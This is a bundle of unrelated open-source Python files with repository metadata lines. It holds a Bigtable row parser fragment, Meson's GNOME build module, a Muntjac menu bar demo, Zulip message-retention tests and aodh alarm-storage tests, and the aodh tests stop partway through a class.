_raise_if(chunk.row_key and
chunk.row_key != self._row.row_key)
_raise_if(chunk.HasField('family_name') and
not chunk.HasField('qualifier'))
previous = self._previous_cell
_raise_if(self._same_as_previous(chunk) and
chunk.timestamp_micros <= previous.timestamp_micros)
def _validate_chunk_cell_in_progress(self, chunk):
"""Helper for :meth:`_validate_chunk`"""
assert self.state == self.CELL_IN_PROGRESS
self._validate_chunk_status(chunk)
self._copy_from_current(chunk)
def _validate_chunk(self, chunk):
"""Helper for :meth:`consume_next`."""
if self.state == self.NEW_ROW:
self._validate_chunk_new_row(chunk)
if self.state == self.ROW_IN_PROGRESS:
self._validate_chunk_row_in_progress(chunk)
if self.state == self.CELL_IN_PROGRESS:
self._validate_chunk_cell_in_progress(chunk)
def _save_current_cell(self):
"""Helper for :meth:`consume_next`."""
row, cell = self._row, self._cell
family = row._cells.setdefault(cell.family_name, {})
qualified = family.setdefault(cell.qualifier, [])
complete = Cell.from_pb(self._cell)
qualified.append(complete)
self._cell, self._previous_cell = None, cell
def _copy_from_current(self, chunk):
"""Helper for :meth:`consume_next`."""
current = self._cell
if current is not None:
if not chunk.row_key:
chunk.row_key = current.row_key
if not chunk.HasField('family_name'):
chunk.family_name.value = current.family_name
if not chunk.HasField('qualifier'):
chunk.qualifier.value = current.qualifier
if not chunk.timestamp_micros:
chunk.timestamp_micros = current.timestamp_micros
if not chunk.labels:
chunk.labels.extend(current.labels)
def _copy_from_previous(self, cell):
"""Helper for :meth:`consume_next`."""
previous = self._previous_cell
if previous is not None:
if not cell.row_key:
cell.row_key = previous.row_key
if not cell.family_name:
cell.family_name = previous.family_name
if not cell.qualifier:
cell.qualifier = previous.qualifier
def _save_current_row(self):
"""Helper for :meth:`consume_next`."""
if self._cell:
self._save_current_cell()
self._rows[self._row.row_key] = self._row
self._row, self._previous_row = None, self._row
self._previous_cell = None
def _raise_if(predicate, *args):
"""Helper for validation methods."""
if predicate:
raise InvalidChunk(*args)
| elibixby/gcloud-python | gcloud/bigtable/row_data.py | Python | apache-2.0 | 15,589 |
# Copyright 2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''This module provides helper functions for Gnome/GLib related
functionality such as gobject-introspection and gresources.'''
import build
import os, sys
import subprocess
from coredata import MesonException
import mlog
class GnomeModule:
def compile_resources(self, state, args, kwargs):
cmd = ['glib-compile-resources', '@INPUT@', '--generate']
if 'source_dir' in kwargs:
d = os.path.join(state.build_to_src, state.subdir, kwargs.pop('source_dir'))
cmd += ['--sourcedir', d]
if 'c_name' in kwargs:
cmd += ['--c-name', kwargs.pop('c_name')]
cmd += ['--target', '@OUTPUT@']
kwargs['command'] = cmd
output_c = args[0] + '.c'
output_h = args[0] + '.h'
kwargs['input'] = args[1]
kwargs['output'] = output_c
target_c = build.CustomTarget(args[0]+'_c', state.subdir, kwargs)
kwargs['output'] = output_h
target_h = build.CustomTarget(args[0] + '_h', state.subdir, kwargs)
return [target_c, target_h]
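# Illustrative sketch (not part of this module): from a meson.build file the
# method above would typically be reached as
#
#   gnome = import('gnome')
#   res = gnome.compile_resources('myres', 'myres.gresource.xml',
#                                 source_dir : 'data', c_name : 'myres')
#
# yielding the generated .c/.h custom targets returned above; the resource
# names here are placeholders.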
def generate_gir(self, state, args, kwargs):
if len(args) != 1:
raise MesonException('Gir takes one argument')
girtarget = args[0]
while hasattr(girtarget, 'held_object'):
girtarget = girtarget.held_object
if not isinstance(girtarget, (build.Executable, build.SharedLibrary)):
raise MesonException('Gir target must be an executable or shared library')
pkgstr = subprocess.check_output(['pkg-config', '--cflags', 'gobject-introspection-1.0'])
pkgargs = pkgstr.decode().strip().split()
ns = kwargs.pop('namespace')
nsversion = kwargs.pop('nsversion')
libsources = kwargs.pop('sources')
girfile = '%s-%s.gir' % (ns, nsversion)
depends = [girtarget]
scan_command = ['g-ir-scanner', '@INPUT@']
scan_command += pkgargs
scan_command += ['--namespace='+ns, '--nsversion=' + nsversion, '--warn-all',
'--output', '@OUTPUT@']
for incdirs in girtarget.include_dirs:
for incdir in incdirs.get_incdirs():
scan_command += ['-I%s' % os.path.join(state.environment.get_source_dir(), incdir)]
if 'link_with' in kwargs:
link_with = kwargs.pop('link_with')
for link in link_with:
lib = link.held_object
scan_command += ['-l%s' % lib.name]
if isinstance(lib, build.SharedLibrary):
scan_command += ['-L%s' %
os.path.join(state.environment.get_build_dir(),
lib.subdir)]
depends.append(lib)
if 'includes' in kwargs:
includes = kwargs.pop('includes')
if isinstance(includes, str):
scan_command += ['--include=%s' % includes]
elif isinstance(includes, list):
scan_command += ['--include=%s' % inc for inc in includes]
else:
raise MesonException('Gir includes must be str or list')
if state.global_args.get('c'):
scan_command += ['--cflags-begin']
scan_command += state.global_args['c']
scan_command += ['--cflags-end']
if kwargs.get('symbol_prefix'):
sym_prefix = kwargs.pop('symbol_prefix')
if not isinstance(sym_prefix, str):
raise MesonException('Gir symbol prefix must be str')
scan_command += ['--symbol-prefix=%s' % sym_prefix]
if kwargs.get('identifier_prefix'):
identifier_prefix = kwargs.pop('identifier_prefix')
if not isinstance(identifier_prefix, str):
raise MesonException('Gir identifier prefix must be str')
scan_command += ['--identifier-prefix=%s' % identifier_prefix]
if kwargs.get('export_packages'):
pkgs = kwargs.pop('export_packages')
if isinstance(pkgs, str):
scan_command += ['--pkg-export=%s' % pkgs]
elif isinstance(pkgs, list):
scan_command += ['--pkg-export=%s' % pkg for pkg in pkgs]
else:
raise MesonException('Gir export packages must be str or list')
deps = None
if 'dependencies' in kwargs:
deps = kwargs.pop('dependencies')
if not isinstance (deps, list):
deps = [deps]
for dep in deps:
girdir = dep.held_object.get_variable ("girdir")
if girdir:
scan_command += ["--add-include-path=%s" % girdir]
inc_dirs = None
if kwargs.get('include_directories'):
inc_dirs = kwargs.pop('include_directories')
if isinstance(inc_dirs.held_object, build.IncludeDirs):
scan_command += ['--add-include-path=%s' % inc for inc in inc_dirs.held_object.get_incdirs()]
else:
raise MesonException('Gir include dirs should be include_directories()')
if isinstance(girtarget, build.Executable):
scan_command += ['--program', girtarget]
elif isinstance(girtarget, build.SharedLibrary):
scan_command += ["-L", os.path.join (state.environment.get_build_dir(), girtarget.subdir)]
libname = girtarget.get_basename()
scan_command += ['--library', libname]
scankwargs = {'output' : girfile,
'input' : libsources,
'command' : scan_command,
'depends' : depends,
}
if kwargs.get('install'):
scankwargs['install'] = kwargs['install']
scankwargs['install_dir'] = os.path.join(state.environment.get_datadir(), 'gir-1.0')
scan_target = GirTarget(girfile, state.subdir, scankwargs)
typelib_output = '%s-%s.typelib' % (ns, nsversion)
typelib_cmd = ['g-ir-compiler', scan_target, '--output', '@OUTPUT@']
if inc_dirs:
typelib_cmd += ['--includedir=%s' % inc for inc in
inc_dirs.held_object.get_incdirs()]
if deps:
for dep in deps:
girdir = dep.held_object.get_variable ("girdir")
if girdir:
typelib_cmd += ["--includedir=%s" % girdir]
kwargs['output'] = typelib_output
kwargs['command'] = typelib_cmd
# Note that this can't be libdir, because e.g. on Debian it points to
# lib/x86_64-linux-gnu but the girepo dir is always under lib.
kwargs['install_dir'] = 'lib/girepository-1.0'
typelib_target = TypelibTarget(typelib_output, state.subdir, kwargs)
return [scan_target, typelib_target]
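# Illustrative sketch (not part of this module): a hypothetical meson.build
# invocation exercising the keyword arguments handled above, with all names
# and versions being placeholders.
#
#   gnome.generate_gir(mylib,
#                      sources : lib_sources,
#                      namespace : 'MyLib',
#                      nsversion : '1.0',
#                      includes : ['GObject-2.0'],
#                      install : true)
#
# which produces the g-ir-scanner target and the g-ir-compiler (.typelib)
# target returned above.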
def compile_schemas(self, state, args, kwargs):
if len(args) != 0:
raise MesonException('Compile_schemas does not take positional arguments.')
srcdir = os.path.join(state.build_to_src, state.subdir)
outdir = state.subdir
cmd = ['glib-compile-schemas', '--targetdir', outdir, srcdir]
kwargs['command'] = cmd
kwargs['input'] = []
kwargs['output'] = 'gschemas.compiled'
if state.subdir == '':
targetname = 'gsettings-compile'
else:
targetname = 'gsettings-compile-' + state.subdir
target_g = build.CustomTarget(targetname, state.subdir, kwargs)
return target_g
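# Illustrative sketch (not part of this module): in a meson.build file this is
# typically invoked with no positional arguments,
#
#   gnome.compile_schemas()
#
# from the subdirectory holding the *.gschema.xml files, producing the
# gschemas.compiled target defined above.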
def gtkdoc(self, state, args, kwargs):
if len(args) != 1:
raise MesonException('Gtkdoc must have one positional argument.')
modulename = args[0]
if not isinstance(modulename, str):
raise MesonException('Gtkdoc arg must be string.')
if not 'src_dir' in kwargs:
raise MesonException('Keyword argument src_dir missing.')
main_file = kwargs.get('main_sgml', '')
if not isinstance(main_file, str):
raise MesonException('Main sgml keyword argument must be a string.')
main_xml = kwargs.get('main_xml', '')
if not isinstance(main_xml, str):
raise MesonException('Main xml keyword argument must be a string.')
if main_xml != '':
if main_file != '':
raise MesonException('You can only specify main_xml or main_sgml, not both.')
main_file = main_xml
src_dir = kwargs['src_dir']
targetname = modulename + '-doc'
command = os.path.normpath(os.path.join(os.path.split(__file__)[0], "../gtkdochelper.py"))
args = [state.environment.get_source_dir(),
state.environment.get_build_dir(),
state.subdir,
os.path.normpath(os.path.join(state.subdir, src_dir)),
main_file,
modulename]
res = [build.RunTarget(targetname, command, args, state.subdir)]
if kwargs.get('install', True):
res.append(build.InstallScript([command] + args))
return res
def gdbus_codegen(self, state, args, kwargs):
if len(args) != 2:
raise MesonException('Gdbus_codegen takes two arguments, name and xml file.')
namebase = args[0]
xml_file = args[1]
cmd = ['gdbus-codegen']
if 'interface_prefix' in kwargs:
cmd += ['--interface-prefix', kwargs.pop('interface_prefix')]
if 'namespace' in kwargs:
cmd += ['--c-namespace', kwargs.pop('namespace')]
cmd += ['--generate-c-code', os.path.join(state.subdir, namebase), '@INPUT@']
outputs = [namebase + '.c', namebase + '.h']
custom_kwargs = {'input' : xml_file,
'output' : outputs,
'command' : cmd
}
return build.CustomTarget(namebase + '-gdbus', state.subdir, custom_kwargs)
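# Illustrative sketch (not part of this module): a hypothetical meson.build
# call matching the arguments handled above; the interface file and prefixes
# are placeholders.
#
#   dbus_src = gnome.gdbus_codegen('my-service', 'com.example.MyService.xml',
#                                  interface_prefix : 'com.example.',
#                                  namespace : 'My')
#
# which yields a custom target generating my-service.c and my-service.h.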
def initialize():
mlog.log('Warning, glib compiled dependencies will not work until this upstream issue is fixed:',
mlog.bold('https://bugzilla.gnome.org/show_bug.cgi?id=745754'))
return GnomeModule()
class GirTarget(build.CustomTarget):
def __init__(self, name, subdir, kwargs):
super().__init__(name, subdir, kwargs)
class TypelibTarget(build.CustomTarget):
def __init__(self, name, subdir, kwargs):
super().__init__(name, subdir, kwargs)
| evgenyz/meson | modules/gnome.py | Python | apache-2.0 | 10,923 |
from muntjac.ui.vertical_layout import VerticalLayout
from muntjac.ui.menu_bar import MenuBar, ICommand
from muntjac.terminal.external_resource import ExternalResource
class MenuBarItemStylesExample(VerticalLayout):
def __init__(self):
super(MenuBarItemStylesExample, self).__init__()
self._menubar = MenuBar()
menuCommand = MenuCommand(self)
# Save reference to individual items so we can add sub-menu items to
# them
f = self._menubar.addItem('File', None)
newItem = f.addItem('New', None)
f.addItem('Open f...', menuCommand)
f.addSeparator()
# Add a style name for a menu item, then use CSS to alter the visuals
f.setStyleName('file')
newItem.addItem('File', menuCommand)
newItem.addItem('Folder', menuCommand)
newItem.addItem('Project...', menuCommand)
f.addItem('Close', menuCommand)
f.addItem('Close All', menuCommand).setStyleName('close-all')
f.addSeparator()
f.addItem('Save', menuCommand)
f.addItem('Save As...', menuCommand)
f.addItem('Save All', menuCommand)
edit = self._menubar.addItem('Edit', None)
edit.addItem('Undo', menuCommand)
edit.addItem('Redo', menuCommand).setEnabled(False)
edit.addSeparator()
edit.addItem('Cut', menuCommand)
edit.addItem('Copy', menuCommand)
edit.addItem('Paste', menuCommand)
edit.addSeparator()
find = edit.addItem('Find/Replace', menuCommand)
# Actions can be added inline as well, of course
find.addItem('Google Search', SearchCommand(self))
find.addSeparator()
find.addItem('Find/Replace...', menuCommand)
find.addItem('Find Next', menuCommand)
find.addItem('Find Previous', menuCommand)
view = self._menubar.addItem('View', None)
view.addItem('Show/Hide Status Bar', menuCommand)
view.addItem('Customize Toolbar...', menuCommand)
view.addSeparator()
view.addItem('Actual Size', menuCommand)
view.addItem('Zoom In', menuCommand)
view.addItem('Zoom Out', menuCommand)
self.addComponent(self._menubar)
class SearchCommand(ICommand):
def __init__(self, c):
self._c = c
def menuSelected(self, selectedItem):
er = ExternalResource('http://www.google.com')
self._c.getWindow().open(er)
class MenuCommand(ICommand):
def __init__(self, c):
self._c = c
def menuSelected(self, selectedItem):
self._c.getWindow().showNotification('Action '
+ selectedItem.getText())
| rwl/muntjac | muntjac/demo/sampler/features/menubar/MenuBarItemStylesExample.py | Python | apache-2.0 | 2,645 |
# -*- coding: utf-8 -*-
import types
from datetime import datetime, timedelta
from django.utils.timezone import now as timezone_now
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.upload import create_attachment
from zerver.models import Message, Realm, Recipient, UserProfile, UserMessage, ArchivedUserMessage, \
ArchivedMessage, Attachment, ArchivedAttachment
from zerver.lib.retention import get_expired_messages, move_message_to_archive
from typing import Any, List
from six.moves import range
class TestRetentionLib(ZulipTestCase):
"""
Test retrieval of expired messages by the retention tool.
"""
def setUp(self):
# type: () -> None
super(TestRetentionLib, self).setUp()
self.zulip_realm = self._set_realm_message_retention_value('zulip', 30)
self.mit_realm = self._set_realm_message_retention_value('zephyr', 100)
@staticmethod
def _set_realm_message_retention_value(realm_str, retention_period):
# type: (str, int) -> Realm
realm = Realm.objects.get(string_id=realm_str)
realm.message_retention_days = retention_period
realm.save()
return realm
@staticmethod
def _change_messages_pub_date(msgs_ids, pub_date):
# type: (List[int], datetime) -> Any
messages = Message.objects.filter(id__in=msgs_ids).order_by('id')
messages.update(pub_date=pub_date)
return messages
def _make_mit_messages(self, message_quantity, pub_date):
# type: (int, datetime) -> Any
# Send messages from the mit.edu realm and change their pub_date.
sender = self.mit_user('espuser')
recipient = self.mit_user('starnine')
msgs_ids = [self.send_message(sender.email, recipient.email, Recipient.PERSONAL) for i in
range(message_quantity)]
mit_messages = self._change_messages_pub_date(msgs_ids, pub_date)
return mit_messages
def test_expired_messages_result_type(self):
# type: () -> None
# Check the return type of the get_expired_messages method.
result = get_expired_messages()
self.assertIsInstance(result, types.GeneratorType)
def test_no_expired_messages(self):
# type: () -> None
result = list(get_expired_messages())
self.assertFalse(result)
def test_expired_messages_in_each_realm(self):
# type: () -> None
# Check the per-realm ordering and content of the result
# when every realm has expired messages.
expired_mit_messages = self._make_mit_messages(3, timezone_now() - timedelta(days=101))
self._make_mit_messages(4, timezone_now() - timedelta(days=50))
zulip_messages_ids = Message.objects.order_by('id').filter(
sender__realm=self.zulip_realm).values_list('id', flat=True)[3:10]
expired_zulip_messages = self._change_messages_pub_date(zulip_messages_ids,
timezone_now() - timedelta(days=31))
# Iterate by result
expired_messages_result = [messages_list for messages_list in get_expired_messages()]
self.assertEqual(len(expired_messages_result), 2)
# Check mit.edu realm expired messages.
self.assertEqual(len(expired_messages_result[0]['expired_messages']), 3)
self.assertEqual(expired_messages_result[0]['realm_id'], self.mit_realm.id)
# Check zulip.com realm expired messages.
self.assertEqual(len(expired_messages_result[1]['expired_messages']), 7)
self.assertEqual(expired_messages_result[1]['realm_id'], self.zulip_realm.id)
# Compare expected messages ids with result messages ids.
self.assertEqual(
sorted([message.id for message in expired_mit_messages]),
[message.id for message in expired_messages_result[0]['expired_messages']]
)
self.assertEqual(
sorted([message.id for message in expired_zulip_messages]),
[message.id for message in expired_messages_result[1]['expired_messages']]
)
def test_expired_messages_in_one_realm(self):
# type: () -> None
# Check a realm that has expired messages as well as messages
# that are one day away from expiring.
expired_mit_messages = self._make_mit_messages(5, timezone_now() - timedelta(days=101))
actual_mit_messages = self._make_mit_messages(3, timezone_now() - timedelta(days=99))
expired_messages_result = list(get_expired_messages())
expired_mit_messages_ids = [message.id for message in expired_mit_messages]
expired_mit_messages_result_ids = [message.id for message in
expired_messages_result[0]['expired_messages']]
actual_mit_messages_ids = [message.id for message in actual_mit_messages]
self.assertEqual(len(expired_messages_result), 1)
self.assertEqual(len(expired_messages_result[0]['expired_messages']), 5)
self.assertEqual(expired_messages_result[0]['realm_id'], self.mit_realm.id)
# Compare expected messages ids with result messages ids.
self.assertEqual(
sorted(expired_mit_messages_ids),
expired_mit_messages_result_ids
)
# Check that the still-current mit.edu messages are not in the expired messages list
self.assertEqual(
set(actual_mit_messages_ids) - set(expired_mit_messages_ids),
set(actual_mit_messages_ids)
)
class TestMoveMessageToArchive(ZulipTestCase):
def setUp(self):
# type: () -> None
super(TestMoveMessageToArchive, self).setUp()
self.sender = '[email protected]'
self.recipient = '[email protected]'
def _create_attachments(self):
# type: () -> None
sample_size = 10
dummy_files = [
('zulip.txt', '1/31/4CBjtTLYZhk66pZrF8hnYGwc/zulip.txt', sample_size),
('temp_file.py', '1/31/4CBjtTLYZhk66pZrF8hnYGwc/temp_file.py', sample_size),
('abc.py', '1/31/4CBjtTLYZhk66pZrF8hnYGwc/abc.py', sample_size)
]
user_profile = self.example_user('hamlet')
for file_name, path_id, size in dummy_files:
create_attachment(file_name, path_id, user_profile, size)
def _check_messages_before_archiving(self, msg_id):
# type: (int) -> List
user_messages_ids_before = list(UserMessage.objects.filter(
message_id=msg_id).order_by('id').values_list('id', flat=True))
self.assertEqual(ArchivedUserMessage.objects.count(), 0)
self.assertEqual(ArchivedMessage.objects.count(), 0)
return user_messages_ids_before
def _check_messages_after_archiving(self, msg_id, user_msgs_ids_before):
# type: (int, List[int]) -> None
self.assertEqual(ArchivedMessage.objects.filter(id=msg_id).count(), 1)
self.assertEqual(Message.objects.filter(id=msg_id).count(), 0)
self.assertEqual(UserMessage.objects.filter(message_id=msg_id).count(), 0)
arc_user_messages_ids_after = list(ArchivedUserMessage.objects.filter(
message_id=msg_id).order_by('id').values_list('id', flat=True))
self.assertEqual(arc_user_messages_ids_after, user_msgs_ids_before)
def test_personal_message_archiving(self):
# type: ()-> None
msg_id = self.send_message(self.sender, [self.recipient], Recipient.PERSONAL)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
def test_stream_message_archiving(self):
# type: ()-> None
msg_id = self.send_message(self.sender, "Verona", Recipient.STREAM)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
def test_archiving_message_second_time(self):
# type: ()-> None
msg_id = self.send_message(self.sender, "Verona", Recipient.STREAM)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
with self.assertRaises(Message.DoesNotExist):
move_message_to_archive(message_id=msg_id)
def test_archiving_message_with_attachment(self):
# type: () -> None
self._create_attachments()
body = """Some files here ...[zulip.txt](
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/zulip.txt)
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/temp_file.py ....
Some more.... http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/abc.py
"""
msg_id = self.send_message(self.sender, [self.recipient], Recipient.PERSONAL, body)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
attachments_ids_before = list(Attachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(ArchivedAttachment.objects.count(), 0)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
self.assertEqual(Attachment.objects.count(), 0)
arc_attachments_ids_after = list(ArchivedAttachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(attachments_ids_before, arc_attachments_ids_after)
def test_archiving_message_with_shared_attachment(self):
# type: () -> None
# Check that attachments still referenced by other messages are not removed.
self._create_attachments()
body = """Some files here ...[zulip.txt](
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/zulip.txt)
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/temp_file.py ....
Some more.... http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/abc.py
"""
msg_id = self.send_message(self.sender, [self.recipient], Recipient.PERSONAL, body)
msg_id_shared_attachments = self.send_message(self.recipient, [self.sender],
Recipient.PERSONAL, body)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
attachments_ids_before = list(Attachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(ArchivedAttachment.objects.count(), 0)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
self.assertEqual(Attachment.objects.count(), 3)
arc_attachments_ids_after = list(ArchivedAttachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(attachments_ids_before, arc_attachments_ids_after)
move_message_to_archive(message_id=msg_id_shared_attachments)
self.assertEqual(Attachment.objects.count(), 0)
| amanharitsh123/zulip | zerver/tests/test_retention.py | Python | apache-2.0 | 11,333 |
#
# Copyright 2013 Intel Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Base classes for DB backend implementation test
"""
import datetime
from unittest import mock
from oslo_utils import timeutils
from aodh import storage
from aodh.storage import models as alarm_models
from aodh.tests import constants
from aodh.tests.functional import db as tests_db
ALARM_TYPE = 'gnocchi_aggregation_by_metrics_threshold'
METRIC_IDS = ['41869681-5776-46d6-91ed-cccc43b6e4e3',
'a1fb80f4-c242-4f57-87c6-68f47521059e']
class DBTestBase(tests_db.TestBase):
@staticmethod
def create_side_effect(method, exception_type, test_exception):
def side_effect(*args, **kwargs):
if test_exception.pop():
raise exception_type
else:
return method(*args, **kwargs)
return side_effect
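# Illustrative sketch (not part of the original tests): each call through the
# wrapper pops a flag from ``test_exception`` (last element first); a True
# flag raises ``exception_type``, a False flag delegates to the wrapped
# method. A hypothetical use, with RuntimeError standing in for a storage
# error:
#
#   flags = [False, True]   # first call raises, second call succeeds
#   wrapper = self.create_side_effect(self.alarm_conn.get_alarms,
#                                     RuntimeError, flags)
#   with mock.patch.object(self.alarm_conn, 'get_alarms',
#                          side_effect=wrapper):
#       ...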
def setUp(self):
super(DBTestBase, self).setUp()
patcher = mock.patch.object(timeutils, 'utcnow')
self.addCleanup(patcher.stop)
self.mock_utcnow = patcher.start()
self.mock_utcnow.return_value = datetime.datetime(2015, 7, 2, 10, 39)
class AlarmTestBase(DBTestBase):
def add_some_alarms(self):
alarms = [alarm_models.Alarm(alarm_id='r3d',
enabled=True,
type=ALARM_TYPE,
name='red-alert',
description='my red-alert',
timestamp=datetime.datetime(2015, 7,
2, 10, 25),
user_id='me',
project_id='and-da-boys',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=['http://nowhere/alarms'],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[dict(name='testcons',
start='0 11 * * *',
duration=300)],
rule=dict(comparison_operator='eq',
threshold=36,
aggregation_method='count',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS),
severity='low'
),
alarm_models.Alarm(alarm_id='0r4ng3',
enabled=True,
type=ALARM_TYPE,
name='orange-alert',
description='a orange',
timestamp=datetime.datetime(2015, 7,
2, 10, 40),
user_id='me',
project_id='and-da-boys',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=['http://nowhere/alarms'],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[],
rule=dict(comparison_operator='gt',
threshold=75,
aggregation_method='avg',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS),
severity='low'
),
alarm_models.Alarm(alarm_id='y3ll0w',
enabled=False,
type=ALARM_TYPE,
name='yellow-alert',
description='yellow',
timestamp=datetime.datetime(2015, 7,
2, 10, 10),
user_id='me',
project_id='and-da-boys',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=['http://nowhere/alarms'],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[],
rule=dict(comparison_operator='lt',
threshold=10,
aggregation_method='min',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS),
severity='low'
)]
for a in alarms:
self.alarm_conn.create_alarm(a)
class AlarmTest(AlarmTestBase):
def test_empty(self):
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual([], alarms)
def test_list(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(3, len(alarms))
def test_list_ordered_by_timestamp(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(len(alarms), 3)
alarm_l = [a.timestamp for a in alarms]
alarm_l_ordered = [datetime.datetime(2015, 7, 2, 10, 40),
datetime.datetime(2015, 7, 2, 10, 25),
datetime.datetime(2015, 7, 2, 10, 10)]
self.assertEqual(alarm_l_ordered, alarm_l)
def test_list_enabled(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(enabled=True))
self.assertEqual(2, len(alarms))
def test_list_disabled(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(enabled=False))
self.assertEqual(1, len(alarms))
def test_list_by_type(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(type=ALARM_TYPE))
self.assertEqual(3, len(alarms))
def test_list_excluded_by_name(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(name={'ne': 'yellow-alert'}))
self.assertEqual(2, len(alarms))
alarm_names = sorted([a.name for a in alarms])
self.assertEqual(['orange-alert', 'red-alert'], alarm_names)
def test_add(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(3, len(alarms))
metrics = sorted([a.rule['metrics'] for a in alarms])
self.assertEqual([METRIC_IDS, METRIC_IDS, METRIC_IDS], metrics)
def test_update(self):
self.add_some_alarms()
metrics = ['6841c175-d7c4-4bc2-bc7a-1c7832271b8f',
'bc1efaa5-93b4-4518-8337-18519917c15a']
orange = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
orange.enabled = False
orange.state = alarm_models.Alarm.ALARM_INSUFFICIENT_DATA
orange.rule['metrics'] = metrics
updated = self.alarm_conn.update_alarm(orange)
self.assertFalse(updated.enabled)
self.assertEqual(alarm_models.Alarm.ALARM_INSUFFICIENT_DATA,
updated.state)
self.assertEqual(metrics, updated.rule['metrics'])
def test_update_llu(self):
llu = alarm_models.Alarm(alarm_id='llu',
enabled=True,
type=ALARM_TYPE,
name='llu',
description='llu',
timestamp=constants.MIN_DATETIME,
user_id='bla',
project_id='ffo',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=[],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[],
rule=dict(comparison_operator='lt',
threshold=34,
aggregation_method='max',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS)
)
updated = self.alarm_conn.create_alarm(llu)
updated.state = alarm_models.Alarm.ALARM_OK
updated.description = ':)'
self.alarm_conn.update_alarm(updated)
all = list(self.alarm_conn.get_alarms())
self.assertEqual(1, len(all))
def test_update_deleted_alarm_failed(self):
self.add_some_alarms()
alarm1 = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
self.alarm_conn.delete_alarm(alarm1.alarm_id)
survivors = list(self.alarm_conn.get_alarms())
self.assertEqual(2, len(survivors))
alarm1.state = alarm_models.Alarm.ALARM_ALARM
self.assertRaises(storage.AlarmNotFound,
self.alarm_conn.update_alarm, alarm1)
survivors = list(self.alarm_conn.get_alarms())
self.assertEqual(2, len(survivors))
def test_delete(self):
self.add_some_alarms()
victim = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
self.alarm_conn.delete_alarm(victim.alarm_id)
survivors = list(self.alarm_conn.get_alarms())
self.assertEqual(2, len(survivors))
for s in survivors:
self.assertNotEqual(victim.name, s.name)
class AlarmHistoryTest(AlarmTestBase):
def setUp(self):
super(AlarmTestBase, self).setUp()
self.add_some_alarms()
self.prepare_alarm_history()
def prepare_alarm_history(self):
alarms = list(self.alarm_conn.get_alarms())
for alarm in alarms:
i = alarms.index(alarm)
alarm_change = {
"event_id": "3e11800c-a3ca-4991-b34b-d97efb6047d%s" % i,
"alarm_id": alarm.alarm_id,
"type": alarm_models.AlarmChange.CREATION,
"detail": "detail %s" % alarm.name,
"user_id": alarm.user_id,
"project_id": alarm.project_id,
"on_behalf_of": alarm.project_id,
"timestamp": datetime.datetime(2014, 4, 7, 7, 30 + i)
}
self.alarm_conn.record_alarm_change(alarm_change=alarm_change)
def _clear_alarm_history(self, utcnow, ttl, count):
self.mock_utcnow.return_value = utcnow
self.alarm_conn.clear_expired_alarm_history_data(ttl, 100)
history = list(self.alarm_conn.query_alarm_history())
